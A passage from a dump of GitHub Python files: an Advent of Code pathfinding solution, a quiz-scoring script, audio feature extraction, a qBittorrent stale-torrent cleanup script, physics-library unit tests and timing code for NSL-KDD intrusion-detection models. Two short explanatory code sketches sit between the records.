len(squares_to_check) > 0:\n curr_square = heapq.heappop(squares_to_check)\n curr_height = grid[curr_square.loc]\n if curr_height == \"E\":\n curr_height = 'z'\n # check upwards\n check_loc = (curr_square.loc[0]-1, curr_square.loc[1])\n check_length = curr_square.path_length + 1\n if check_loc[0] >= 0 and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[0] >= 0 and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check downwards\n check_loc = (curr_square.loc[0]+1, curr_square.loc[1])\n check_length = curr_square.path_length + 1\n if check_loc[0] < grid.shape[0] and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[0] < grid.shape[0] and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check left\n check_loc = (curr_square.loc[0], curr_square.loc[1]-1)\n check_length = curr_square.path_length + 1\n if check_loc[1] >= 0 and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[1] >= 0 and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n # check right\n check_loc = (curr_square.loc[0], curr_square.loc[1]+1)\n check_length = curr_square.path_length + 1\n if check_loc[1] < grid.shape[1] and grid[check_loc] == \"S\":\n start_found = True\n if (check_loc[1] < grid.shape[1] and\n ord(curr_height) - ord(grid[check_loc]) <= 1 and\n path_lengths[check_loc] > (check_length)):\n path_lengths[check_loc] = check_length\n new_square = Square(check_length, (check_loc))\n heapq.heappush(squares_to_check, new_square)\n\nmin_length = no_go_length\nfor position in starting_positions:\n start_loc = (position[0], position[1])\n if path_lengths[start_loc] < min_length:\n min_length = path_lengths[start_loc]\n\n\n\nprint(min_length)","repo_name":"nicohiggs/advent_of_code_2022","sub_path":"day_12/problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
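Since every step costs 1, the Dijkstra heap above is equivalent to a plain BFS, and the four copy-pasted direction blocks collapse into a loop. A self-contained sketch on a toy grid (all names local to this snippet; the real puzzle searches outward from 'E' exactly like this):

# Sketch: BFS from 'E' with a direction loop; toy 2x3 height grid.
from collections import deque
import numpy as np

grid = np.array([['w', 'x', 'y'], ['x', 'y', 'E']])
dist = {(1, 2): 0}                      # search outward from 'E'
queue = deque([(1, 2)])
while queue:
    r, c = queue.popleft()
    h = 'z' if grid[r, c] == 'E' else grid[r, c]
    for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
        nr, nc = r + dr, c + dc
        if 0 <= nr < grid.shape[0] and 0 <= nc < grid.shape[1] \
                and (nr, nc) not in dist and ord(h) - ord(grid[nr, nc]) <= 1:
            dist[(nr, nc)] = dist[(r, c)] + 1
            queue.append((nr, nc))
print(dist.get((0, 0)))  # steps from 'E' back to the 'w' corner -> 3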
{"seq_id":"44269032941","text":"import sys\n\nn = int(input())\n\n\ndef fast_input():\n return sys.stdin.readline().rstrip()\n\n\ncount = 0\ntotal = 0\nfor _ in range(n):\n sol = fast_input() # read input faster than input()\n \n for ox in sol:\n if ox == 'O':\n count += 1\n total += count\n else:\n count = 0\n\n print(total)\n count, total = 0, 0 # reset after each test case","repo_name":"Rhange/BOJ_PS","sub_path":"_forLevels/_1Darray/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"39933896317","text":"import os\r\nimport math\r\nimport librosa\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nimport configparser\r\n\r\nclass FeatureSave:\r\n def __init__(self, args, CFG):\r\n self.args = args\r\n self.CFG = CFG\r\n\r\n def createpath(self):\r\n myfiles = os.listdir(self.args.srcdir)\r\n pathlist = list(map(lambda filename : self.args.srcdir+\"/\"+filename, myfiles))\r\n return pathlist\r\n\r\n def writelabel(self):\r\n df = pd.read_csv(self.args.labelpath, sep='\\t', header=None, dtype=\"str\")\r\n \r\n pathnlabel = list(map(lambda i: self.args.dstdir+\"/my_npyfiles/\"+df[0][i]+\".npy\"+\"\\t\"+df[1][i][:len(np.load(self.args.dstdir+\"/my_npyfiles/\"+df[0][i]+\".npy\"))+1], range(len(df))))\r\n textfile = open(self.args.dstdir+\"/Data.txt\", \"w\")\r\n for element in pathnlabel:\r\n textfile.write(element + \"\\n\")\r\n textfile.close()\r\n\r\n def savenpy(self, path, bank):\r\n direc = self.args.dstdir+\"/my_npyfiles\"\r\n if not os.path.exists(direc):\r\n os.makedirs(direc)\r\n np.save( direc+\"/\"+(path.split(\".wav\")[0]).split(\"/\")[-1] +\".npy\", bank)\r\n \r\n def extractfeatures(self):\r\n pathlist = self.createpath()\r\n \r\n for path in pathlist:\r\n d,fs = librosa.load(path,sr=None)\r\n audio = list(map(lambda i : d[i:i+ self.CFG['seg_length']], range(0,len(d), self.CFG['seg_length']) ))[:-1] # remove last segment\r\n bank = list()\r\n hann = np.hanning(self.CFG['seg_length'])\r\n\r\n for segment in audio:\r\n if (self.CFG['need_hann']):\r\n segment = np.multiply(segment,hann)\r\n melfb = librosa.feature.melspectrogram(y=segment, n_fft=self.CFG['n_fft'], win_length=self.CFG['win_length'], hop_length=self.CFG['hop_length'],n_mels=self.CFG['n_mels'])\r\n melfb = np.array(list(map(lambda ele: ele[:-2], melfb)))\r\n melfb = np.log10( 1 + melfb.flatten()) # remove first and last feature: 21 -> 19\r\n # melfb = np.log10( 1 + melfb)\r\n bank.append(melfb)\r\n self.savenpy(path, bank)\r\n self.writelabel() ","repo_name":"jagabandhumishra/E2E_LD","sub_path":"compute_melspect.py","file_name":"compute_melspect.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
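The per-segment feature in extractfeatures is a windowed log-mel spectrogram. A self-contained sketch of that one step with hypothetical sample rate and sizes (the real values live in the CFG dict):

# Sketch: one segment's log-mel feature; 8000 Hz and the frame sizes below
# are illustrative assumptions, not the repository's configuration.
import numpy as np
import librosa

seg = np.random.randn(400).astype(np.float32) * np.hanning(400)
mel = librosa.feature.melspectrogram(y=seg, sr=8000, n_fft=256,
                                     win_length=200, hop_length=80, n_mels=21)
feat = np.log10(1 + mel.flatten())  # compress dynamic range, then flatten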
{"seq_id":"19235801474","text":"#!/home/dulanic/python_scripts/qbt/venv/bin/python\nimport os\nfrom functions import ts, sizeof_fmt, qb\nfrom collections import Counter\nfrom urllib.parse import urlparse\n\ndef tracker_convert(tracker):\n a = trdict.get(tracker)\n return a\n\ndef reason_str(reason_num, age, ratio):\n reason_dict = {\n 1: f\"bad tracker\",\n 2: f\"seeding for {age} days\",\n 3: f\"seeding for {age} days and {ratio} ratio\",\n 4: f\"seeding ratio of {ratio}\"\n }\n\n b = reason_dict.get(reason_num)\n return b\n\nc = 1\n\ntrdict = {\n \"localhost.stackoverflow.tech\": \"IPT\",\n \"tracker.beyond-hd.me\": \"BHD\",\n \"ssl.empirehost.me\": \"IPT\",\n \"routing.bgp.technology\": \"IPT\",\n \"tracker.gazellegames.net\": \"GGN\",\n \"tracker.privatehd.to\": \"PHD\",\n \"tracker.tleechreload.org\": \"TL\",\n \"tracker.torrentleech.org\": \"TL\",\n \"speed.connecting.center\": \"SCD\",\n \"tracker.tv-vault.me\": \"TVV\", \n \"tracker.cinemaz.to\": \"CIN\",\n \"tracker.pixelhd.me\": \"PIX\",\n \"abtorrents.me\": \"ABM\",\n \"tt.jumbohostpro.eu\": \"PHD\",\n \"tracker.alpharatio.cc\": \"AR\",\n \"t.connecting.center\": \"PHD\"\n}\n\n# Trackers whose torrents are excluded from auto-deletion\ntr_exclude = [\n 'TVV',\n 'GGN',\n 'ABM'\n]\n\nfn = os.path.basename(__file__)\ntorrent_list = [] \ntorrent_list_to_check = [] \ndel_ct = 0 \ndel_size = 0 \ntorrent_list_file_size = 0 \ntorrent_list_ct = []\nhash_list_to_delete = [] \n\nfor t in qb.torrents_info():\n torrent_list_ct.append(tracker_convert(urlparse(t.tracker).hostname))\n for i in t.trackers:\n for u in str(i.tier):\n if u.isnumeric():\n r = qb.torrents_files(hash=t.hash)\n torrent = [t.hash,t.size,t.name,tracker_convert(urlparse(t.tracker).hostname),1,t.ratio,t.category,t.num_seeds,t.seeding_time/86400]\n torrent_list.append(torrent) if torrent not in torrent_list else torrent_list\n torrent_list_file_size += t.size\n torrent_list_to_check.append(torrent) if (i.msg in ('unregistered torrent','Torrent is not found or it is awaiting moderation','002: Invalid InfoHash, Torrent not found','Unregistered torrent') or 'Season pack uploaded' in i.msg) and torrent not in torrent_list_to_check else torrent_list_to_check \n torrent = [t.hash,t.size,t.name,tracker_convert(urlparse(t.tracker).hostname),3,t.ratio,t.category,t.num_seeds,t.seeding_time/86400]\n #if torrent[3] == None:\n # print(torrent)\n if (t.ratio > 2 and t.category == 'archive' and t.seeding_time > (60*60*24*30)):\n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n elif t.seeding_time > 7776000:\n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n elif t.ratio > 10: # delete if > 2.0 and in archive or if 30+ days old \n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n\ntrackct = Counter(torrent_list_ct) # count of items for each tracker \n\nfor rw in torrent_list_to_check:\n tracker, ratio, age, reason_num = rw[3], round(rw[5],2), round(rw[8]), rw[4]\n if (tracker not in tr_exclude and trackct[rw[3]] > 2) or reason_num == 1:\n del_reason = reason_str(reason_num, age, ratio) \n if reason_num == 1 or reason_num in [2,3,4]:\n print(f'{ts()} - {fn} - {rw[2]} has been deleted due to {del_reason}')\n del_ct += 1\n del_size += rw[1]\n hash_list_to_delete.append(rw[0])\n\nif len(hash_list_to_delete) > 0:\n qb.torrents_delete(torrent_hashes=hash_list_to_delete,delete_files=True)\n\nprint(f'{ts()} - {fn} - Scanned a total of {len(torrent_list)} files totalling {sizeof_fmt(torrent_list_file_size)}')\n\nif len(torrent_list_to_check) > 0: \n print(f'{ts()} - {fn} - Deleted a total of {del_ct} file(s) with a total size of {sizeof_fmt(del_size)}')\nelse:\n print(f'{ts()} - {fn} - No stale files found to be deleted')\n","repo_name":"Dulanic/python_scripts","sub_path":"qbt/qbt.py","file_name":"qbt.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"11867366923","text":"import sys\nfrom copy import deepcopy\nfrom typing import Dict, List, Tuple\n\nimport attrs\nimport pytest\n\nfrom qrules import InteractionType, ProblemSet, StateTransitionManager\nfrom qrules.combinatorics import (\n ParticleWithSpin,\n _create_edge_id_particle_mapping,\n match_external_edges,\n perform_external_edge_identical_particle_combinatorics,\n)\nfrom qrules.particle import Particle\nfrom qrules.quantum_numbers import (\n EdgeQuantumNumbers,\n InteractionProperties,\n NodeQuantumNumbers,\n)\nfrom qrules.system_control import (\n create_edge_properties,\n filter_graphs,\n remove_duplicate_solutions,\n require_interaction_property,\n)\nfrom qrules.topology import Edge, MutableTransition, Topology\n\nif sys.version_info < (3, 8):\n from importlib_metadata import version\nelse:\n from importlib.metadata import version\n\n\n@pytest.mark.parametrize(\n (\n \"initial_state\",\n \"final_state\",\n \"final_state_groupings\",\n \"result_graph_count\",\n ),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]]],\n 1,\n ),\n (\n [(\"Y(4260)\", [-1, 1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", 
\"pi0\"], [\"D~0\", \"pi0\"]]],\n 2,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 9,\n ),\n (\n [(\"Y(4260)\", [-1, 1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 18,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]], [\"D0\", \"pi0\"]],\n 3,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi0\"]],\n 4,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"gamma\"]],\n 4,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 8,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi-\"]],\n 0,\n ),\n ],\n)\ndef test_external_edge_initialization(\n particle_database,\n initial_state,\n final_state,\n final_state_groupings,\n result_graph_count,\n):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n for group in final_state_groupings:\n stm.add_final_state_grouping(group)\n\n problem_sets = stm.create_problem_sets()\n if problem_sets.values():\n assert len(next(iter(problem_sets.values()))) == result_graph_count\n\n\ndef get_pi0_width() -> float:\n if version(\"particle\") < \"0.16\":\n return 7.73e-09\n return 7.81e-09\n\n\ndef __get_d_pos() -> Tuple[float, float]:\n if version(\"particle\") < \"0.16\":\n return 1.86965, 6.33e-13\n if version(\"particle\") < \"0.21\":\n return 1.86966, 6.33e-13\n return 1.86966, 6.37e-13\n\n\ndef __get_f2_1270_pos() -> Tuple[float, float]:\n if version(\"particle\") < \"0.23\":\n return 1.2755, 0.18669999999999998\n return 1.2754, 0.1866\n\n\n@pytest.mark.parametrize(\n (\"particle_name\", \"spin_projection\", \"expected_properties\"),\n [\n (\n \"pi0\",\n 0,\n {\n EdgeQuantumNumbers.pid: 111,\n EdgeQuantumNumbers.mass: 0.1349768,\n EdgeQuantumNumbers.width: get_pi0_width(),\n EdgeQuantumNumbers.spin_magnitude: 0.0,\n EdgeQuantumNumbers.spin_projection: 0,\n EdgeQuantumNumbers.charge: 0,\n EdgeQuantumNumbers.isospin_magnitude: 1.0,\n EdgeQuantumNumbers.isospin_projection: 0.0,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 0,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: -1,\n EdgeQuantumNumbers.c_parity: 1,\n EdgeQuantumNumbers.g_parity: -1,\n },\n ),\n (\n \"D+\", # no g and c parity\n 0,\n {\n EdgeQuantumNumbers.pid: 411,\n EdgeQuantumNumbers.mass: __get_d_pos()[0],\n EdgeQuantumNumbers.width: __get_d_pos()[1],\n EdgeQuantumNumbers.spin_magnitude: 0.0,\n EdgeQuantumNumbers.spin_projection: 0,\n EdgeQuantumNumbers.charge: 1,\n EdgeQuantumNumbers.isospin_magnitude: 0.5,\n EdgeQuantumNumbers.isospin_projection: 0.5,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 1,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: -1,\n 
EdgeQuantumNumbers.c_parity: None,\n EdgeQuantumNumbers.g_parity: None,\n },\n ),\n (\n \"f(2)(1270)\", # spin projection 1\n 1.0,\n {\n EdgeQuantumNumbers.pid: 225,\n EdgeQuantumNumbers.mass: __get_f2_1270_pos()[0],\n EdgeQuantumNumbers.width: __get_f2_1270_pos()[1],\n EdgeQuantumNumbers.spin_magnitude: 2.0,\n EdgeQuantumNumbers.spin_projection: 1.0,\n EdgeQuantumNumbers.charge: 0,\n EdgeQuantumNumbers.isospin_magnitude: 0.0,\n EdgeQuantumNumbers.isospin_projection: 0.0,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 0,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: 1,\n EdgeQuantumNumbers.c_parity: 1,\n EdgeQuantumNumbers.g_parity: 1,\n },\n ),\n ],\n)\ndef test_create_edge_properties(\n particle_name,\n spin_projection,\n expected_properties,\n particle_database,\n skh_particle_version: str,\n):\n particle = particle_database[particle_name]\n assert create_edge_properties(particle, spin_projection) == expected_properties\n assert skh_particle_version is not None # dummy for skip tests\n\n\ndef make_ls_test_graph(angular_momentum_magnitude, coupled_spin_magnitude, particle):\n topology = Topology(\n nodes={0},\n edges={-1: Edge(None, 0)},\n )\n interactions = {\n 0: InteractionProperties(\n s_magnitude=coupled_spin_magnitude,\n l_magnitude=angular_momentum_magnitude,\n )\n }\n states: Dict[int, ParticleWithSpin] = {-1: (particle, 0)}\n return MutableTransition(topology, states, interactions) # type: ignore[arg-type,var-annotated]\n\n\ndef make_ls_test_graph_scrambled(\n angular_momentum_magnitude, coupled_spin_magnitude, particle\n):\n topology = Topology(\n nodes={0},\n edges={-1: Edge(None, 0)},\n )\n interactions = {\n 0: InteractionProperties(\n l_magnitude=angular_momentum_magnitude,\n s_magnitude=coupled_spin_magnitude,\n )\n }\n states: Dict[int, ParticleWithSpin] = {-1: (particle, 0)}\n return MutableTransition(topology, states, interactions) # type: ignore[arg-type,var-annotated]\n\n\nclass TestSolutionFilter:\n @pytest.mark.parametrize(\n (\"ls_pairs\", \"result\"),\n [\n ([(1, 0), (1, 1)], 2),\n ([(1, 0), (1, 0)], 1),\n ],\n )\n def test_remove_duplicates(self, ls_pairs, result, particle_database):\n pi0 = particle_database[\"pi0\"]\n graphs = []\n for ls_pair in ls_pairs:\n graphs.append(make_ls_test_graph(ls_pair[0], ls_pair[1], pi0))\n\n results = remove_duplicate_solutions(graphs)\n assert len(results) == result\n\n for ls_pair in ls_pairs:\n graphs.append(make_ls_test_graph_scrambled(ls_pair[0], ls_pair[1], pi0))\n results = remove_duplicate_solutions(graphs)\n assert len(results) == result\n\n @pytest.mark.parametrize(\n (\"input_values\", \"filter_parameters\", \"result\"),\n [\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 2,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (2, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 1,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo~\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 0,\n ),\n (\n [(\"foo\", (0, 0)), (\"foo\", (1, 1)), (\"foo\", (2, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1, 2],\n ),\n 2,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.s_magnitude,\n [1],\n ),\n 1,\n ),\n ],\n )\n def 
test_filter_graphs_for_interaction_qns(\n self, input_values, filter_parameters, result, particle_database\n ):\n graphs = []\n pi0 = particle_database[\"pi0\"]\n\n for value in input_values:\n tempgraph = make_ls_test_graph(value[1][0], value[1][1], pi0)\n tempgraph = attrs.evolve(\n tempgraph,\n states={\n -1: (\n Particle(name=value[0], pid=0, mass=1.0, spin=1.0),\n 0.0,\n )\n },\n )\n graphs.append(tempgraph)\n\n my_filter = require_interaction_property(*filter_parameters)\n filtered_graphs = filter_graphs(graphs, [my_filter])\n assert len(filtered_graphs) == result\n\n\ndef _create_graph(\n problem_set: ProblemSet,\n) -> \"MutableTransition[ParticleWithSpin, InteractionProperties]\":\n return MutableTransition(\n topology=problem_set.topology,\n interactions=problem_set.initial_facts.interactions, # type: ignore[arg-type]\n states=problem_set.initial_facts.states, # type: ignore[arg-type]\n )\n\n\n@pytest.mark.parametrize(\n (\"initial_state\", \"final_state\"),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n ],\n)\ndef test_edge_swap(particle_database, initial_state, final_state):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n\n problem_sets = stm.create_problem_sets()\n init_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n for graph in init_graphs:\n ref_mapping = _create_edge_id_particle_mapping(\n graph, graph.topology.outgoing_edge_ids\n )\n edge_keys = list(ref_mapping.keys())\n edge1 = edge_keys[0]\n edge1_val = graph.topology.edges[edge1]\n edge1_props = deepcopy(graph.states[edge1])\n edge2 = edge_keys[1]\n edge2_val = graph.topology.edges[edge2]\n edge2_props = deepcopy(graph.states[edge2])\n graph.swap_edges(edge1, edge2)\n assert graph.topology.edges[edge1] == edge2_val\n assert graph.topology.edges[edge2] == edge1_val\n assert graph.states[edge1] == edge2_props\n assert graph.states[edge2] == edge1_props\n\n\n@pytest.mark.parametrize(\n (\"initial_state\", \"final_state\"),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n ],\n)\ndef test_match_external_edges(particle_database, initial_state, final_state):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n\n problem_sets = stm.create_problem_sets()\n init_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n match_external_edges(init_graphs)\n\n iter_graphs = iter(init_graphs)\n first_graph = next(iter_graphs)\n ref_mapping_fs = _create_edge_id_particle_mapping(\n first_graph, first_graph.topology.outgoing_edge_ids\n )\n ref_mapping_is = _create_edge_id_particle_mapping(\n first_graph, first_graph.topology.incoming_edge_ids\n )\n\n for graph in iter_graphs:\n assert ref_mapping_fs == _create_edge_id_particle_mapping(\n graph, first_graph.topology.outgoing_edge_ids\n )\n assert ref_mapping_is == _create_edge_id_particle_mapping(\n graph, 
first_graph.topology.incoming_edge_ids\n )\n\n\n@pytest.mark.parametrize(\n (\n \"initial_state\",\n \"final_state\",\n \"final_state_groupings\",\n \"result_graph_count\",\n ),\n [\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]]],\n 2,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"D0\", \"pi0\"]],\n 6,\n ),\n (\n [(\"J/psi(1S)\", [1])],\n [(\"gamma\", [1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi0\"]],\n 1,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 12,\n ),\n (\n [(\"J/psi(1S)\", [1])],\n [(\"gamma\", [1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"gamma\"]],\n 2,\n ),\n ],\n)\ndef test_external_edge_identical_particle_combinatorics(\n particle_database,\n initial_state,\n final_state,\n final_state_groupings,\n result_graph_count,\n):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n for group in final_state_groupings:\n stm.add_final_state_grouping(group)\n\n problem_sets = stm.create_problem_sets()\n\n init_graphs = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n match_external_edges(init_graphs)\n\n comb_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for group in init_graphs:\n comb_graphs.extend(\n perform_external_edge_identical_particle_combinatorics(group)\n )\n assert len(comb_graphs) == result_graph_count\n\n ref_mapping_fs = _create_edge_id_particle_mapping(\n comb_graphs[0], comb_graphs[0].topology.outgoing_edge_ids\n )\n ref_mapping_is = _create_edge_id_particle_mapping(\n comb_graphs[0], comb_graphs[0].topology.incoming_edge_ids\n )\n\n for group in comb_graphs[1:]:\n assert ref_mapping_fs == _create_edge_id_particle_mapping(\n group, group.topology.outgoing_edge_ids\n )\n assert ref_mapping_is == _create_edge_id_particle_mapping(\n group, group.topology.incoming_edge_ids\n )\n","repo_name":"ComPWA/qrules","sub_path":"tests/unit/test_system_control.py","file_name":"test_system_control.py","file_ext":"py","file_size_in_byte":17141,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
{"seq_id":"35938576379","text":"import datetime\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.models import load_model\n\nfrom densenet.classifiers.one_d import DenseNet121\n\nfeature = [\"duration\", \"protocol_type\", \"service\", \"flag\", \"src_bytes\", \"dst_bytes\", \"land\", \"wrong_fragment\",\n \"urgent\",\n \"hot\",\n \"num_failed_logins\", \"logged_in\", \"num_compromised\", \"root_shell\", \"su_attempted\", \"num_root\",\n \"num_file_creations\", \"num_shells\",\n \"num_access_files\", \"num_outbound_cmds\", \"is_host_login\", \"is_guest_login\", \"count\", \"srv_count\",\n \"serror_rate\", \"srv_serror_rate\",\n \"rerror_rate\", \"srv_rerror_rate\", \"same_srv_rate\", \"diff_srv_rate\", \"srv_diff_host_rate\",\n \"dst_host_count\",\n \"dst_host_srv_count\",\n \"dst_host_same_srv_rate\", \"dst_host_diff_srv_rate\", \"dst_host_same_src_port_rate\",\n \"dst_host_srv_diff_host_rate\", \"dst_host_serror_rate\",\n \"dst_host_srv_serror_rate\", \"dst_host_rerror_rate\", 
\"dst_host_srv_rerror_rate\", \"label\", \"difficulty\"]\n\ntrain = \"./data/nsl-kdd/KDDTrain+.txt\"\ntrain_data = pd.read_csv(train, names=feature)\ntrain_data.drop([\"difficulty\"], axis=1, inplace=True)\n# print(train_data[\"label\"].value_counts())\n\ns = [\"normal\", \"back\", \"land\", \"neptune\", \"pod\", \"smurf\", \"teardrop\", \"mailbomb\", \"processtable\", \"udpstorm\",\n \"apache2\", \"worm\"]\ntrain_data = train_data.loc[train_data[\"label\"].isin(s)]\nprint(train_data[\"label\"].value_counts())\n\nmulti_data = train_data.copy()\nmulti_label = pd.DataFrame(multi_data.label)\n\nstd_scaler = StandardScaler()\n\n\ndef standardization(df, col):\n for i in col:\n arr = df[i]\n arr = np.array(arr)\n df[i] = std_scaler.fit_transform(arr.reshape(len(arr), 1))\n return df\n\n\nnumeric_col = multi_data.select_dtypes(include=\"number\").columns\ndata = standardization(multi_data, numeric_col)\n\nle2 = preprocessing.LabelEncoder()\nenc_label = multi_label.apply(le2.fit_transform)\nmulti_data[\"intrusion\"] = enc_label\n\nmulti_data.drop(labels=[\"label\"], axis=1, inplace=True)\nmulti_data = pd.get_dummies(multi_data, columns=[\"protocol_type\", \"service\", \"flag\"], prefix=\"\", prefix_sep=\"\")\ny_train_multi = multi_data[[\"intrusion\"]]\nX_train_multi = multi_data.drop(labels=[\"intrusion\"], axis=1)\nX_train_multi = np.expand_dims(X_train_multi, 2)\n\nX_train_multi = X_train_multi[:1, :, :]\n\nVGG = load_model(\"model/VGG.h5\")\n\n# warm up GPU\n_ = VGG.predict(X_train_multi)\n\ntotal = 0\nfor _ in range(10):\n a = datetime.datetime.now()\n _ = VGG.predict(X_train_multi)\n b = datetime.datetime.now()\n\n total += (b - a).microseconds / 1000\n\nprint(\"VGG inference time : \", total / 10, \"ms\")\n\nDenseNet = load_model(\"model/DenseNet.h5\", custom_objects={'DenseNet121': DenseNet121})\n_ = DenseNet.predict(X_train_multi)\n\ntotal = 0\nfor _ in range(10):\n a = 